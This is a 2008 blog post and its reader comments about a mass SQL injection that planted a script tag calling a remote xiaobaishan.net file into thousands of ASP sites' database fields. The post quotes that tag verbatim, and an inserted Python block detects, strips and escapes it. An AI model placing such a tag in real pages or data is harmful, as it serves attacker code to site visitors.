It’s very rare that I get the inside scoop on a bomb hack, but this time I’m one of the victims. It seems that some kind of SQL injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.
As I’m doing my nightly check of the site I do SEO for, banler.com, I notice that it’s running slow as molasses. It can’t be the hardware, because it’s on a pretty powerful VPS server. But I notice that it’s waiting on some unknown script. I do a quick source check and I see that every single one of my navigational items has this freaky call in it:
<script src=http://www.xiaobaishan.net/dt/us/Help.asp></script>
My security mind goes into full effect and I jump into the server to check around. The codebase is completely clean. Nothing like that in there. Since my app is in ASP.NET, I know that code hacking is pretty difficult, as ASP.NET DLLs are obfuscated (messed up so only ASP.NET can understand it), so I know that’s not it.
Since it was my navigation that was hit, and my navigation is run from a SQL 2000 database, I jump into the database, start opening up tables and, as we say in my Cuban neighborhood, FUACATA! There you go, a shitload of this strange script call all through the database. I contact the database admin to see if they have a backup, and as of this writing, they’re working on it.
But it made me wonder who the heck was doing this. So I did a little search on Google, and I found this result.
UPDATE: 4080 sites hacked.
That’s right: about two thousand eight hundred (updated: four thousand and eighty) websites affected as of right now. Who knows what it will be in the morning.
UPDATE 6/2/08: Checked with Yahoo and Live. Seems that number might be up to about 20,000. Xiaobaishan is apparently the name of a volcano.
When I try to check out the site, nothing exists, so I’m thinking that this was some type of malware keyboard recorder, or some other fucked up hack. There are some pretty impressive sites in this result set, and some of these were hacked a few days ago, so I’m hoping that their webmasters and site administrators are catching this.
So far, all of the sites that have been hacked are ASP or ASP.NET based sites. Now I know what you’re going to say, Windows tech and all of that, but ASP.NET has been famous for avoiding hacks. This seems like a SQL 2000 hack. Someone must have been sniffing for the database connections and got them, then somehow gained control of the individual databases, and went to town inserting this code into everything they could find. Since a lot of database driven websites have their navigation dynamically generated from the database, blamo.
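The mechanism described above (a script tag stored in database text fields, then copied into every page because the navigation is rendered straight from those fields) is easy to check for and to neutralize on the output side. The following is an added example, not code from this post or from banler.com: it scans a set of rows for injected external script tags, strips them for cleanup, and shows the difference between dumping stored text into HTML unescaped and HTML-escaping it on output. The rows are constructed sample data; only the tag text itself is the one quoted in the post. Tag positions in the samples vary, since a commenter below notes the tag is not always at the end of the field.

```python
import html
import re

# Constructed sample navigation rows (id, label). Not real banler.com data.
# Rows 2 and 3 carry the tag quoted in the post, at different positions in the field.
SAMPLE_NAV_ROWS = [
    (1, "Home"),
    (2, "About Us<script src=http://www.xiaobaishan.net/dt/us/Help.asp></script>"),
    (3, "Contact<script src=http://www.xiaobaishan.net/dt/us/Help.asp></script> Us"),
    (4, "Careers"),
]

# A <script ...></script> pair whose src points at an absolute (external) URL.
# Quotes around the URL are optional, matching the unquoted form seen in the post.
INJECTED_SCRIPT_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?\s*(?:https?:)?//[^>]*>\s*</script>',
    re.IGNORECASE,
)


def find_injected_rows(rows):
    """Return (row_id, matched_tag) for every injected script tag found in the rows."""
    hits = []
    for row_id, text in rows:
        for match in INJECTED_SCRIPT_RE.finditer(text):
            hits.append((row_id, match.group(0)))
    return hits


def strip_injected_scripts(text):
    """Remove every injected external script tag from one text field."""
    return INJECTED_SCRIPT_RE.sub("", text)


def clean_rows(rows):
    """Return the rows with injected tags removed, and the number of rows that changed."""
    cleaned, changed = [], 0
    for row_id, text in rows:
        new_text = strip_injected_scripts(text)
        changed += new_text != text
        cleaned.append((row_id, new_text))
    return cleaned, changed


def render_nav_unsafe(rows):
    """Concatenate stored text straight into HTML: whatever is in the database runs in the browser."""
    return "".join(f"<li>{text}</li>" for _, text in rows)


def render_nav_safe(rows):
    """HTML-escape on output: a stored tag is displayed as text instead of being executed."""
    return "".join(f"<li>{html.escape(text)}</li>" for _, text in rows)


if __name__ == "__main__":
    for row_id, tag in find_injected_rows(SAMPLE_NAV_ROWS):
        print(f"row {row_id}: {tag}")
    cleaned, n_changed = clean_rows(SAMPLE_NAV_ROWS)
    print(f"{n_changed} rows cleaned")
    print(render_nav_safe(cleaned))
```

Cleaning the rows restores the stored data, but output escaping is what stops the next injection from reaching visitors: with `render_nav_safe`, a compromised database row shows up as visible garbage in the menu rather than as a script the browser fetches. For fields that must hold real HTML, a whitelist sanitizer takes the place of `html.escape`.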
I’m not a security expert and certainly not an IP packet expert or any kind of tech expert, so I can’t really comment on what happened and how to fix it. All I can say is I hate freakin hackers. I mean, this world is full of nefarious people of all shapes and sizes and cultures, but sometimes I feel that we in the Search Industry ought to have some kind of defense, other than technical, that we can all work together on.
In any case, mister hacker, I could bestow a curse upon you the likes of which the internet has never seen before, where even the maker of “two girls one cup” would cringe at the ramifications of my hate filled bombastic flurry of verbal fire. But you know what? I’ve changed in the last few years, and I can only say this. Bless you man. I hope that whatever thrill this gave you or whatever benefits you think you’re going to get will make you happy for a short while. I’ve noticed that the universe dishes out much heavier karma than what we throw at it, and the bad waves you’ve made today will someday return and affect your life personally. I hope for your sake it’s just a computer malfunction, or a credit card snafu. But in all honesty, the way I see it, when God wants you punished, it’s not a one day thing. You can’t just say “Ok, I’m sorry, I won’t do it again” and hope that everything will be ok. I know this because I’ve earned myself some karma justice in the past, and it comes hard and angry and lasts for years and years. Watch your health and your family’s health. Think about what you’ve done and I hope you learn something from it. I hope you learn that you are killing businesses, and people’s livelihoods. I hope you learn that gains are little when compared to personal loss.
I hope you learn now before it’s too late.
This article seems to be the only one anywhere on this issue. A search using Google turns up loads of sites which have been hit, with this damn code in the heading.
This bomb is causing my employer havoc. We have a project to help people with spinal cord injuries who want to return to work. The project is due to be launched next Monday (9th June) and the database used by our job search engine has been well and truly stuffed. To make matters worse, the guy who designed the program has just left to take up a new job, and although he will continue to work on the project, his first responsibility is to his new employer.
As of this morning (4th June 2008), the entry has changed to
Interesting, my last comment didn’t display the new entry, which is: “”
The entry is always 30 characters into the field or at the end of the field whichever comes first.
I give up!
These domains are morphing really, really quickly. I think there are two rival sets of hackers though – this one seems to be a Chinese crew, but there’s also a Russian crew attacking servers. Sometimes the same server gets hit by both crews.
[sigh]